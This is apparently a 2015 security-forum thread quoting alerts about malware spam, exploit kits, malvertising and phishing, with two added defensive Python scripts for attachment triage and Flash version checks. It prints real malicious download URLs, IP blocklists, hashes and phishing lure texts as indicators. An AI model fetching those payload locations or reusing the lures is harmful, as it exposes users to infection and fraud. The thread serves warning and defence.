- The two common malware families seen are W97M_MARKER and W2KM_DLOADR.
- You can see X2KM_DLOADR detections around the start of February.
- A couple more significant ones like W2KM_DOXMAL and W2KM_MONALIS started showing up on the 2nd week of March
- Finally, W2KM_BARTALEX started picking up middle of February and was seen up to the last week of March... The macro code was instrumental in dropping the .DLL file that instated the malware, GHOLE. Targeted attack campaigns would usually use vulnerabilities that had been determined to be effective on a target, or even zero-day vulnerabilities. This operation, however, had taken a much easier route of using the tired, old method of traditional malware. If you take the methods employed by GHOLE, ZBOT, DRIDEX, ROVNIX and VAWTRAK, we’ve all seen them in the past – as well as macro malware and email-borne threats... the right time has come and known threats are repackaged with old methods, resulting in what we now determine to be equally effective..."
___
Fiesta EK wreaks havoc on popular Torrent Site
- https://blog.malwarebytes.org/exploits-2/2015/05/fiesta-ek-wreaks-havoc-on-popular-torrent-site/
May 4, 2015 - "... Besides the illegal nature of the act in some countries, many sites that index torrents are filled with aggressive ads and pop ups often tricking the user to run programs and other junk that they don’t need. To get the actual content you were looking for is often a battle that could end with some unwanted toolbars added to your browser, or worse, malware. Such is the case with popular Torrent index SubTorrents .com, a very popular Torrent in Spain and Latin America... Users trying to download their favourite TV show may end up getting more than they were looking for. Upon browsing the site, a malicious -redirection- silently loads the Fiesta exploit kit and associated malware payload. Fortunately, Malwarebytes Anti-Exploit users were shielded from this threat... Given the large amounts of ads on the site, it would have been fair to suspect a malvertising issue, but this was not the case here. Rather, the site itself has been -compromised- and serves a well hidden iframe... the author had some fun trying to make things a little more complicated. Rather than directly inserting a malicious iframe (to the exploit kit landing), they chose to build it on the fly by retrieving the content from an external .js... The exploit kit is Fiesta EK and we noticed a new format, where semi colons are now commas... Downloading illegal Torrents is dangerous business. On top of fake files that waste your time and bandwidth, users have to navigate through a sea of misleading ads and pop ups. They may end up saving a few bucks off that latest movie but could also risk a lot more, like getting a nasty malware infection. Ransomware being so prevalent these days could mean that all of a user’s files, including those movies and songs could be encrypted and held for ransom. Regardless, it is important to stay safe from such attacks by keeping your computer up-to-date..."
(More detail at the malwarebytes URL above.)
:fear::fear: :mad:
AplusWebMaster
2015-05-05, 14:06
FYI...
Fake 'INVOICE' SPAM - doc/xls malware attached
- http://myonlinesecurity.co.uk/ref-dw95009ksg-from-050515-for-review-word-doc-or-excel-xls-spreadsheet-malware/
5 May, 2015 - "'Ref: DW95009KSG [random characters] from 05/05/15 for review' coming from random names and email addresses with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email contains an image of an invoice downloaded from a website and looks like:
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/05/invoice_Ref-DW95009KSG-from_-for-review-1024x686.png
If you have your email client set to read in plain text only, then you get an email which just reads as pure garbled junk text.
5 May 2015 : DW95009KSG.doc - Current Virus total detections: 0/56* ... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/a9f30994e614d77e90f096eab66de87da0d4cc658e62314c1a5eface490252d0/analysis/1430822826/
___
Smartphone Apps secretly connect to User Tracking and Ad Sites
Security researchers have developed an automated system for detecting Android apps that secretly connect to ad sites and user tracking sites.
- http://www.technologyreview.com/view/537186/the-truth-about-smartphone-apps-that-secretly-connect-to-user-tracking-and-ad-sites/
May 1, 2015 MIT - "There are essentially two starkly different environments in which to download apps. The first is Apple’s app store, which carefully vets apps before allowing only those deemed fit to appear. The second is the Google Play store, which is more -open- because Google exercises a lighter touch in vetting apps, only excluding those that are obviously malicious. But because Google Play is more open, the apps it offers span a much wider quality range. Many connect to ad-related sites and tracking sites while some connect to much more dubious sites that are associated with malware. But here’s the problem — this activity often takes place without the owner being aware of what is going on. That’s something that most smartphone users would be appalled to discover — if only they were able to... In total, the apps connect to a mind-boggling 250,000 different urls across almost 2,000 top level domains. And while most attempt to connect to just a handful of ad and tracking sites, some are much more prolific... Most users of these apps will have little, if any, knowledge of this kind of behavior..."
(More detail at the technologyreview URL above.)
:fear: :mad:
AplusWebMaster
2015-05-06, 14:28
FYI...
Fake 'SEPA' SPAM - malware attachment
- http://myonlinesecurity.co.uk/urgent-notice-about-your-sepa-payment-malware/
6 May 2015 - "'Urgent notice about your SEPA Payment' coming from random names and email addresses with a zip attachment is another one from the current bot runs... The email looks like:
The SWIFT transaction, recently initiated from your company’s online banking account, was aborted by the Electronic Payments Association.
Aborted transfer
SWIFT Processing Case ID G10536592
Transaction Amount 38058.65 Pounds sterling
E-mail info@thespykiller .co .uk
Reason of rejection View details
Please click the address given at the top to see the statement with all details about this case.
-or-
The online transaction, recently sent from your company’s checking account, was cancelled by the other financial institution.
Rejected transfer
Transaction Case ID R89716531
Total 21696.96 GBP
Billing E-mail amy@hedgehoghelp .co .uk
Reason for rejection View details
Please click the address you can find above to open the MS Word document with the full info about this problem.
There are dozens if not -hundreds- of different -dropbox- links with this series of spam emails. It is very likely that each one will have a different sha256# so the detections on VirusTotal might well be incorrect.
6 May 2015: online Payment6688.zip : Extracts to: Rejected SWIFT Transaction.doc Word Document_86535.scr - Current Virus total detections: 2/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper word doc instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/bcad4914d78789733a5730d8d5ca174e37c08315f52bb198a4bde45281facd5a/analysis/1430902669/
___
Fake 'Invoice 37333' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/invoice-37333-from-contract-security-services-limited-word-doc-or-excel-xls-spreadsheet-malware/
6 May 2015 - "'Invoice 37333 from CONTRACT SECURITY SERVICES LIMITED' pretending to come from accounts3 <accounts3@ contractsecurity .co .uk> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/05/Invoice-37333-from-CONTRACT-SECURITY-SERVICES-LIMITED.png
6 May 2015 : Inv_37333_from_CONTRACT_SECURITY_SERVICES_LTD_3000.doc
Current Virus total detections: 2/57* ... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/20de1316fe309450b65f0a863b39271726988f7e40cd0e7bcac3e304ddb28d13/analysis/1430904557/
___
Fake 'Check your requisite' SPAM – PDF malware
- http://myonlinesecurity.co.uk/check-your-requisite-fake-pdf-malware/
6 May 2015 - "'Check your requisite' coming from random names and email addresses with a zip attachment is another one from the current bot runs... The email looks like:
Good morning
Could You please check your requisite details under the contract #4HZKYN
The contract number in the body of the email matches the zip attachment name.
6 May 2015: QmXFW4.zip: Extracts to: invalidation_invoice_report.exe
Current Virus total detections: 2/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/c639784685ce0bf59ba476b8a0aac663d573b973563167a083d33c6e27102c00/analysis/1430906359/
... Behavioural information
___
Fake 'Transport' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/email-from-transport-for-london-word-doc-or-excel-xls-spreadsheet-malware/
6 May 2015 - "Email from 'Transport for London' pretending to come from noresponse@ cclondon .com with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/05/Email-from-Transport-for-London.png
6 May 2015 : AP0210780545.doc - Current Virus total detections: 2/57*
... which downloads from volpefurniture .com/111/46.exe (VirusTotal**)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/c9f0ec93f4d8bfbccc60d01630bc70a5a5e3863608536f3003aa3e787801ce66/analysis/1430908758/
** https://www.virustotal.com/en/file/42b044da606588ebd897603d92765b37d3a416ee92fb983117b36d61eedd2827/analysis/1430909515/
... Behavioural information
- http://blog.dynamoo.com/2015/05/malware-spam-email-from-transport-for.html
6 May 2015
... Recommended blocklist:
62.152.36.90
89.28.83.228
185.12.95.191
185.15.185.201 ..."
___
ADP Invoice Spam
- http://threattrack.tumblr.com/post/118293581183/adp-invoice-spam
May 6, 2015 - "Subjects Seen:
ADP invoice for week ending 05/06/2015
Typical e-mail details:
Your most recent ADP invoice is attached for your review.
If you have any questions regarding this invoice, please contact your ADP service team at the number provided on the invoice for assistance.
Please note that your bank account will be debited within one banking business day for the amount(s) shown on the invoice.
Thank you for choosing ADP for your business solutions.
Important: Please do not respond to this message. It comes from an unattended mailbox.
Malicious File Name and MD5:
invoice_400119471.exe (222ddd63ab85f03ff344c4328e58896c)
Tagged: ADP, Upatre
___
IRS e-Help Desk Spam
- http://threattrack.tumblr.com/post/118299463428/irs-e-help-desk-spam
May 6, 2015 - "Subjects Seen:
E-mail Receipt Confirmation - Ticket#SD0180867
Typical e-mail details:
The IRS e-help Desk has received your email on 05/06/15. A case has been opened in response to your question or issue.
Your case ID is : SD0180867
Details about this case has been attached.
If additional contact is necessary, please reference this case ID.
You will receive a reply within two business days.
Thank you for contacting the IRS e-help Desk.
Malicious File Name and MD5:
SD743299.exe (222ddd63ab85f03ff344c4328e58896c)
Tagged: IRS, Upatre
:fear: :mad:
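The "spoofed icon" attachments described in the posts above (a .zip that extracts to an .exe or .scr wearing a PDF or Word icon, or a name like "Rejected SWIFT Transaction.doc Word Document_86535.scr") only fool a user who sees the icon and not the real extension. As an added defender-side example, not code from any of the quoted blogs, the Python script below triages a zip attachment the way a mail gateway or helpdesk could: it ignores the icon and judges each member by its real extension and its file header. The sample archives are constructed inline and the "MZ" stub is inert padding, not a real executable.

```python
"""Triage e-mail zip attachments for executables masquerading as documents.

Added example for this thread (not code from the quoted blogs). Works offline on
constructed archives; the only dependency is the standard library.
"""
import io
import zipfile

# Extensions Windows will execute directly; a document icon on one of these is the lure.
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs", ".jse"}
# Extensions the lure pretends to be.
DOCUMENT_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".rtf", ".txt"}
# Magic bytes checked at the start of each member (first 8 bytes are enough here).
MAGIC = {
    b"MZ": "PE executable",
    b"%PDF": "PDF",
    b"\xd0\xcf\x11\xe0": "OLE2 (legacy .doc/.xls)",
}


def identify_header(head: bytes) -> str:
    """Name the file type from its leading bytes, or 'unknown'."""
    for magic, label in MAGIC.items():
        if head.startswith(magic):
            return label
    return "unknown"


def classify_member(name: str, head: bytes) -> list:
    """Return the findings for one archive member ([] means nothing suspicious)."""
    findings = []
    base = name.lower().rsplit("/", 1)[-1]          # drop any folder prefix
    pieces = base.split(".")
    ext = "." + pieces[-1] if len(pieces) > 1 else ""
    kind = identify_header(head)

    if ext in EXECUTABLE_EXTS:
        findings.append(f"executable extension {ext}")
    # Double extension such as invoice.pdf.exe: the hidden last part is the real one.
    inner = {"." + p for p in pieces[1:-1]} & DOCUMENT_EXTS
    if inner:
        findings.append(f"double extension posing as {sorted(inner)[0]}")
    # A document extension buried mid-name, followed by a space, as in the SWIFT lure.
    if any(d + " " in base for d in DOCUMENT_EXTS):
        findings.append("document extension followed by a space in the name")
    # The header is what actually runs; it overrides whatever the name claims.
    if kind == "PE executable":
        findings.append("PE (MZ) header")
        if ext not in EXECUTABLE_EXTS:
            findings.append(f"PE content behind non-executable extension {ext or '(none)'}")
    return findings


def triage_zip(data: bytes) -> dict:
    """Map every file in the zip to its findings, reading only the first 8 bytes of each."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(8)
            report[info.filename] = classify_member(info.filename, head)
    return report


def is_suspicious(data: bytes) -> bool:
    """True when any member of the archive produced at least one finding."""
    return any(triage_zip(data).values())


def build_zip(members: dict) -> bytes:
    """Build a constructed in-memory archive from {name: content bytes}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed stand-ins for the attachments described in the thread. FAKE_PE is an inert
# two-byte "MZ" marker plus zero padding, not an executable of any kind.
FAKE_PE = b"MZ" + b"\x00" * 62
SAMPLES = {
    "payslip.zip": build_zip({"payslip.exe": FAKE_PE}),
    "online Payment6688.zip": build_zip(
        {"Rejected SWIFT Transaction.doc Word Document_86535.scr": FAKE_PE}),
    "double_ext.zip": build_zip({"Docs_23131445.pdf.exe": FAKE_PE}),
    "renamed.zip": build_zip({"Account_info.pdf": FAKE_PE}),
    "genuine.zip": build_zip({"statement.pdf": b"%PDF-1.4\n%constructed\n"}),
}

if __name__ == "__main__":
    for zname, blob in SAMPLES.items():
        for member, findings in triage_zip(blob).items():
            verdict = "SUSPICIOUS" if findings else "ok"
            print(f"{zname}: {member}: {verdict} {'; '.join(findings)}")
```

Only the first eight bytes of each member are read, so a large attachment costs no more than a small one, and the name checks are case-insensitive.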
AplusWebMaster
2015-05-07, 14:05
FYI...
Fake 'order' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/you-order-form-word-doc-or-excel-xls-spreadsheet-malware/
7 May 2015 - "'You order form:[XY12469DMM] from 06/05/15 recived; MYTRAH ENERGY LTD' ... with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
We have received your order form [XY12469DMM] and we thank you very much. Our sales department informs us that they are able to dispatch your stock by the end of next week following your packing instructions.
As agreed, we have arranged transport. We are sending herewith a copy of our pro-forma invoice.
The consignment will be sent as soon as the bank informs us that the sum is available. We hope you will be satisfied with the fulfilment of this order and that it will be the beginning of a business relationship to our mutual benefit.
Best regards, Hallie Foreman
MYTRAH ENERGY LTD
7 May 2015 : XY12469DMM.doc - Current Virus total detections: 0/56*
The malicious macro in this example tries to connect to pastebin .com/download.php?i=VTd9HVkz where it downloads an encrypted/encoded text file which in turn is used to contact http ://91.226.93.14/stat/get.php and downloads test.exe (VirusTotal**). This also attempts to download an image from savepic .org/7260406.jpg... why or what purpose this is used for except to try to persuade you that the file is innocent. This image is of an orthodox Jewish man, but yesterday’s malicious word docs tried to use an image of the Russian President Vladimir Vladimirovich Putin... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/4279be7398ee5c46b325364b58212d2428a27aee000323c64deeac453f14a5da/analysis/1430990065/
** https://www.virustotal.com/en/file/c36837a6f4a8a839fb2f5fe87650aede43713177814761d7c5156bb9b89a73d2/analysis/1430990250/
... Behavioural information
___
Fake 'invoice' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/your-invoice-from-price-company-01537833-rep-word-doc-or-excel-xls-spreadsheet-malware/
7 May 2015 - "'Your invoice from Price & Company 01537833 REP' pretending to come from focus@ price-regency .co .uk with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... This email has what appears to be a genuine word doc or Excel XLS spreadsheet attached which is malformed and contains a macro script virus... The email looks like:
Attached is your invoice 01537833.
7 May 2015 : 01537833.doc - Current Virus total detections: 2/52*
... which tries to connect to hmcomercial .com.br/75/47.exe ... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/d4d135b5c5839942bfb3fdf3c608ab4424f0e005483adddc436f524068716903/analysis/1430990459/
___
Fake 'Payslip' SPAM - PDF malware
- http://myonlinesecurity.co.uk/payslip-for-period-end-date-30042015-fake-pdf-malware/
7 May 2015 - "'Payslip for period end date 30/04/2015' pretending to come from noreply@ fermanagh .gov .uk with a zip attachment is another one from the current bot runs... The email when it arrives working looks like:
Dear administrator
Please find attached your payslip for period end 30/04/2015
Payroll Section
————
7 May 2015: payslip.zip: Extracts to: payslip.exe
Current Virus total detections: 0/58 (virus Total currently down so will update later)
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
___
Fake 'Credit Note' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/credit-note-scspackaging-word-doc-or-excel-xls-spreadsheet-malware/
7 May 2015 - "'Credit Note' pretending to come from sales@ scspackaging .co .uk with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Thank you very much for getting in touch.
Please find credit attached.
Apologies for any inconvenience, we hope this covers everything.
If you have any queries please don’t hesitate to get in touch.
Thank you
Regards
SCS
7 May 2015: Credit Note.doc ... -same- malware payload as today’s earlier malicious word docs 'Your invoice from Price & Company 01537833 REP – word doc or excel xls spreadsheet malware'* although the copy I saw used a -different- download location. There are numerous different download locations around... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* http://myonlinesecurity.co.uk/your-invoice-from-price-company-01537833-rep-word-doc-or-excel-xls-spreadsheet-malware/
___
Lloyds Bank Spam
- http://threattrack.tumblr.com/post/118356242953/lloyds-bank-spam
May 7, 2015 - "Subjects Seen:
Lloyds Bank - Pendeford Securities - Please Read Action Required/PI Documents/ Region code East 2/ 7262921/
Typical e-mail details:
Please find attached our document pack for the above customer. Once completed please return via email to the below address.
If you have any queries relating to the above feel free to contact us at
MN2Lloydsbanking@ lloydsbanking .com
Malicious File Name and MD5:
ReportonTitle770415.1Final 1.exe (8178ad46a72c44cdb9a6146f0952d5bf)
Tagged: Lloyds Bank, Upatre
___
Malvertising strikes dozens of top adult sites
- https://blog.malwarebytes.org/malvertising-2/2015/05/malvertising-strikes-on-dozens-of-top-adult-sites/
May 7, 2015 - "We have been observing a very large malvertising campaign affecting dozens of top adult sites over the past week. All these attacks have a common element, a Flash based infection via a rogue advertiser abusing the AdXpansion ad network... this particular campaign is quite noticeable due to the number of sites affected and their popularity. According to stats from SimilarWeb .com, these adult portals account for a combined 250+ million monthly visits.
drtuber .com 60.2 M
nuvid .com 46.5 M
hardsextube .com 43.7 M
justporno .tv 32.5 M
alphaporno .com 24.9 M
eroprofile .com 18 M
pornerbros .com 16.6 M
pichunter .com 6.6 M
iceporn .com 6.4 M
tubewolf .com 6.2 M
winporn .com 5.4 M ...
As we have seen lately, more and more malvertising attacks are self-contained. The same fraudulent Flash advert is also used as the exploit, making it much more streamlined and sometimes hard to pinpoint. The advert displaying sexual enhancement drugs, is loaded with malicious code that will immediately attempt to exploit the visitor, regardless of whether they click on the ad or not... The bogus advert can exploit Flash Player up until version 17.0.0.134, released less than two months ago... The malware payload may vary but could result in multiple different malicious binaries dropped via a Neutrino-like EK (credit Kafeine*)..."
* http://malware.dontneedcoffee.com/2015/04/cve-2015-0359-flash-up-to-1700134-and.html
"... As spotted by FireEye on 2015-04-17**, Angler EK is now taking advantage of a vulnerability patched with the last version of Flash Player (17.0.0.169)..."
** https://www.fireeye.com/blog/threat-research/2015/04/angler_ek_exploiting.html
Apr 18 2015
___
Rombertik malware ...
- https://blog.malwarebytes.org/security-threat/2015/05/whats-important-about-rombertik/
May 6, 2015 - "... What’s mostly uncommon about Rombertik is that, unlike much of the other malware in circulation today, Rombertik will -trash- the user’s hard drive if certain hash values don’t line up. This is an uncommon practice in malware, although it does happen on occasion. Recall that the malware involved in the Sony Pictures hack of last year did the same thing, and even earlier attacks were happening against banks in South Korea that did the same thing... Unlike those examples though, Rombertik doesn’t appear to be a state-sponsored malware. Instead, it mostly appears in phishing messages and other spam which will fall into the hands of everyday users. Much like everyday malware, most of Rombertik’s actions aren’t too unique. When looking at the picture depicting Rombertik’s course of action*, it’s noted the malware performs a lot of the same techniques seen in malware over the last several years; things like creating “excessive activity” to blow up procmon logs or having the binary overwrite itself in memory with unpacked code (Run PE) aren’t anything new in the world of malware.
* https://blogs.cisco.com/wp-content/uploads/compromise-flow-wm.png
... In the case of Rombertik, the malware writes random bytes to memory many times before proceeding execution. This would be something that conventional malware sandboxes don’t account for, and therefore would be considered an anti-sandbox technique... For the full report on Rombertik by Talos, click here**."
** http://blogs.cisco.com/security/talos/rombertik
May 4, 2015 - "... Rombertik is a complex piece of malware with several layers of obfuscation and anti-analysis functionality that is ultimately designed to steal user data. Good security practices, such as making sure anti-virus software is installed and kept up-to-date, -not- clicking on attachments from unknown senders, and ensuring robust security policies are in place for email (such as blocking certain attachment types) can go a long way when it comes to protecting users. However, a defense in depth approach that covers the entire attack continuum can help identify malware and assist in remediation in the event that an attacker finds a way to evade detection initially..."
- https://atlas.arbor.net/briefs/
May 7, 2015 - "... Rombertik was the subject of recent reports. This new version employs numerous methods to -evade- sandbox forensics, including an attempt to overwrite the MBR if it believes it is being analyzed in memory. A recent spearphishing campaign against Taiwanese government officials targeted the victims through a common consumer grade messaging application. Regardless of the types of applications in use (enterprise or BYOD), attackers will leverage any possible vector in their attempts to fulfill campaign objectives..."
:fear::fear: :mad:
AplusWebMaster
2015-05-08, 12:43
FYI...
Fake 'Scanned tickets' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/scanned-tickets-word-doc-or-excel-xls-spreadsheet-malware/
8 May 2015 - "'Scanned tickets' pretending to come from Rebecca De Mulder <milestoneholdings@ yahoo .co .uk> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Afternoon
Attached are the tickets you have requested
Kinds Regards kath
Milestone Holdings
Tel: 01676 541133
Mob: 07976 440015
08 May 2015: scan0079.xls - Current Virus total detections: 3/56*
Automatic analysis has not detected any network activity or malware download so far. Once we have full details of other analysis we will update this.
Update: manual analysis gives http ://wesleychristianschool .org/43/83.exe as the download location
(VirusTotal**). Note with these there will be -numerous- different macros with different download locations all giving the -same- actual malware... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/01d2cee3230121d5ae785c2c0d96144db0402039d30e5e548196c8327473b7f7/analysis/1431073205/
** https://www.virustotal.com/en/file/53dc289f44cc3c6d4609a8a757fe62a0782b6ee5e2a274140a2d850a53a2287b/analysis/1431074156/
... Behavioural information
TCP connections
62.152.36.90: https://www.virustotal.com/en/ip-address/62.152.36.90/information/
88.221.15.80: https://www.virustotal.com/en/ip-address/88.221.15.80/information/
UDP communications
23.99.222.162: https://www.virustotal.com/en/ip-address/23.99.222.162/information/
wesleychristianschool .org: 192.185.166.117: https://www.virustotal.com/en/ip-address/192.185.166.117/information/
___
PayPal Phish ...
- https://blog.malwarebytes.org/fraud-scam/2015/05/your-account-paypal-has-been-limited-phishing-scam/
May 8, 2015 - "There’s a “Your account has been limited” email in circulation, targeting users of PayPal. The mail, which (bizarrely) claims to come from servicesATapple .com, claims that the account needs to be unlocked by confirming the potential victim’s identity.
> https://blog.malwarebytes.org/wp-content/uploads/2015/05/ppl1.jpg
The Email reads as follows:
Your Account PayPal Has Been Limited !
Dear Customer,
To get back into your PayPal account, you'll need to confirm your identity.
It's easy:
Click on the link below or copy and past the link into your browser.
Confirm that you're the owner of the account, and then follow the instructions.
The link leads to a .ma URL, which is the country code for Morocco:
confirm-identity(dot)me(dot)ma
The page is currently offline, but there’s a collection of related websites with similar URLs as per this VirusTotal page*.
* 72.55.165.59: https://www.virustotal.com/cs/ip-address/72.55.165.59/information/
Some of these have been taken down, a few are still live so it’s probable there are multiple email campaigns leading to each of the -fake- sites... In -all- cases, delete the mail and don’t click on the URLs which aren’t official PayPal domains or secured with https (occasionally phish pages use https, but they’re pretty rare)..."
___
Word Macro Spam
- http://threattrack.tumblr.com/post/118453126458/word-macro-spam
May 8, 2015 - "Subjects Seen:
#3zLT5
#LvaX6
ID: MrYSk
Typical e-mail details:
Sent from my ipad
Malicious File Name and MD5:
99HOaFRD.doc (6162c6b0abc8cab50b9d7c55d71e08fe)
Tagged: Word doc Macro, Upatre, iPad, dyre
___
Ad Network Compromised, Users Victimized by Nuclear Exploit Kit
- http://blog.trendmicro.com/trendlabs-security-intelligence/ad-network-compromised-users-victimized-by-nuclear-exploit-kit/
May 7, 2015 - "MadAdsMedia, a US-based web advertising network, was -compromised- by cybercriminals to lead the visitors of sites that use their advertising platform to Adobe Flash exploits delivered by the Nuclear Exploit Kit. Up to 12,500 users per day may have been affected by this threat; three countries account for more than half of the hits: Japan, the United States, and Australia.
This attack was first seen in April, although at relatively low traffic levels. The number of users at risk grew significantly as May started, with the peak of 12,500 daily affected users reached on May 2:
> https://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/05/MadAds1.jpg
We initially thought that this was another case of malvertising, but later found evidence that said otherwise. Normal malvertising attacks involve the -redirect- being triggered from the advertisement payload registered by the attacker. This was not evident in the MadAdsMedia case... We found in our investigation that the URL didn’t always serve JavaScript code, and instead would sometimes redirect to the Nuclear Exploit Kit server... This led us to the conclusion that the server used by the ad network to save the JavaScript library was compromised to redirect website visitors to the exploit kit. MadAdsMedia serves a variety of websites globally, and several of the affected sites appear to be related to anime and manga. The Flash exploits in use are targeting CVE-2015-0359*, a vulnerability that was patched only in April of this year. Some users may still be running -older- versions of Flash and thus be at risk. The Flash exploits are being delivered by the Nuclear Exploit Kit, a kit that has been constantly updated to add new Flash exploits and has been tied to crypto-ransomware... Attacks like these highlight the importance for ad networks to keep their infrastructure secure from attacks. Making sure that web servers and applications are secure will help ensure the protection of the business and their customers. End users, on the other hand, are advised to keep popular web plugins up to date. Users with the latest versions of Adobe Flash would not have been at risk. Monthly Adobe updates are released at approximately the same time as Patch Tuesday (the second Tuesday of each month); this would be a good time for users to perform what is, in effect, preventive maintenance on their machines..."
* https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0359
Last revised: 04/22/2015 - "Double free vulnerability in Adobe Flash Player before 13.0.0.281 and 14.x through 17.x -before- 17.0.0.169 on Windows and OS X and -before- 11.2.202.457 on Linux allows attackers to execute arbitrary code via unspecified vectors..."
:fear::fear: :mad:
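Added example (my code, not NVD's, Trend Micro's or Malwarebytes'): the NVD text quoted above gives the fixed Flash Player builds per branch and platform, and the Trend Micro post says users on the latest version were not at risk. The check below encodes those ranges so an inventory export of installed Flash versions can be sorted into exposed vs. patched. Assumptions: a literal reading of "before 13.0.0.281" as covering every Windows/OS X build older than that, the platform labels windows/osx/linux, and the inventory rows, which are constructed for the example.

```python
"""Classify Adobe Flash Player versions against the CVE-2015-0359 ranges
quoted from NVD above. Added example, not NVD's or Adobe's code."""
from typing import Dict, Iterable, Tuple

Version = Tuple[int, int, int, int]

# Fixed builds as stated in the NVD text; everything below them on the named
# branch is treated as affected (assumption: a literal reading of "before X").
FIXED_WIN_MAC_13 = (13, 0, 0, 281)      # 13.x extended-support branch
FIXED_WIN_MAC_14_17 = (17, 0, 0, 169)   # 14.x through 17.x
FIXED_LINUX = (11, 2, 202, 457)         # 11.2.x Linux branch


def parse_version(text: str) -> Version:
    """'17.0.0.134' -> (17, 0, 0, 134); rejects anything not four numeric parts."""
    parts = text.strip().split(".")
    if len(parts) != 4 or not all(p.isdigit() for p in parts):
        raise ValueError(f"not a Flash Player version string: {text!r}")
    a, b, c, d = (int(p) for p in parts)
    return (a, b, c, d)


def is_vulnerable_cve_2015_0359(text: str, platform: str = "windows") -> bool:
    """True when the version falls inside one of the affected ranges."""
    v = parse_version(text)
    major = v[0]
    if platform in ("windows", "osx"):
        if major <= 13:
            return v < FIXED_WIN_MAC_13
        if 14 <= major <= 17:
            return v < FIXED_WIN_MAC_14_17
        return False  # 18+ post-dates the fix and is outside the stated ranges
    if platform == "linux":
        return v < FIXED_LINUX
    raise ValueError(f"unknown platform {platform!r}")


def triage_inventory(rows: Iterable[Tuple[str, str, str]]) -> Dict[str, str]:
    """rows of (host, version, platform) -> {host: 'exposed' | 'patched'}."""
    return {host: ("exposed" if is_vulnerable_cve_2015_0359(ver, plat) else "patched")
            for host, ver, plat in rows}


INVENTORY = [  # constructed sample rows, not real hosts
    ("ws01", "17.0.0.134", "windows"),   # the build the malvertising post says is exploitable
    ("ws02", "17.0.0.169", "windows"),   # fixed build from the NVD text
    ("mac01", "13.0.0.250", "osx"),      # below the 13.x fixed build
    ("lnx01", "11.2.202.451", "linux"),  # below the Linux fixed build
    ("ws03", "18.0.0.160", "windows"),   # newer than any affected range
]

if __name__ == "__main__":
    for host, state in triage_inventory(INVENTORY).items():
        print(f"{host}: {state}")
```

Run it against a real export by replacing INVENTORY with rows pulled from your software inventory; anything reported as "exposed" is what the Nuclear/Angler Flash exploits described above would have been able to hit.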
AplusWebMaster
2015-05-11, 15:52
FYI...
Fake 'Fax' SPAM - PDF malware
- http://myonlinesecurity.co.uk/anne-levy-patio-furniture-levy-port-st-lucie-fake-pdf-malware/
11 May 2015 - "'Patio furniture- Levy, Port St. Lucie' coming from random email addresses and random names with a zip attachment is another one from the current bot runs... The email looks like:
Attention:
Please see attached letter. I await your immediate response.
Thank you,
Anne Levy
11 May 2015: ONE example PutkTvy9XAf.zip: Extracts to: Fax_wqe32rq2vgwb_data.exe
Current Virus total detections: 0/56*. All the attachments have random names and extract to random names and numbers but all appear to start with -fax- so far today. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/3f25cd91ae475fa68ca913dedf7648e56ea9b5f97cf1dbd69feaf5b1c9b431be/analysis/1431341851/
___
Fake 'Water Line' SPAM – PDF malware
- http://myonlinesecurity.co.uk/huntsman-way-water-line-fake-pdf-malware/
11 May 2015 "'Huntsman Way Water Line' coming from random names and email addresses with a zip attachment is another one from the current bot runs... The email looks like:
HI,
Was a pleasure talking with you again this morning.
Find attached the quote you requested for your bid.
Please contact us if you have any questions.
Have a great day!
Respectfully,
Steve Geissen
Estimating / Outside Sales (Beaumont / Lufkin)
O:(409)813-2796 F:(409)813-2623 M:(409)363-3038 ...
11 May 2015: 8fs77CjN2XXh.zip: Extracts to: Invoice_w543245345_4323.exe
Current Virus total detections: 3/56*. Another version, as these appear to be random sizes and contents: N3dQrS51H469.zip extracts to Fax_11112436_4323.exe
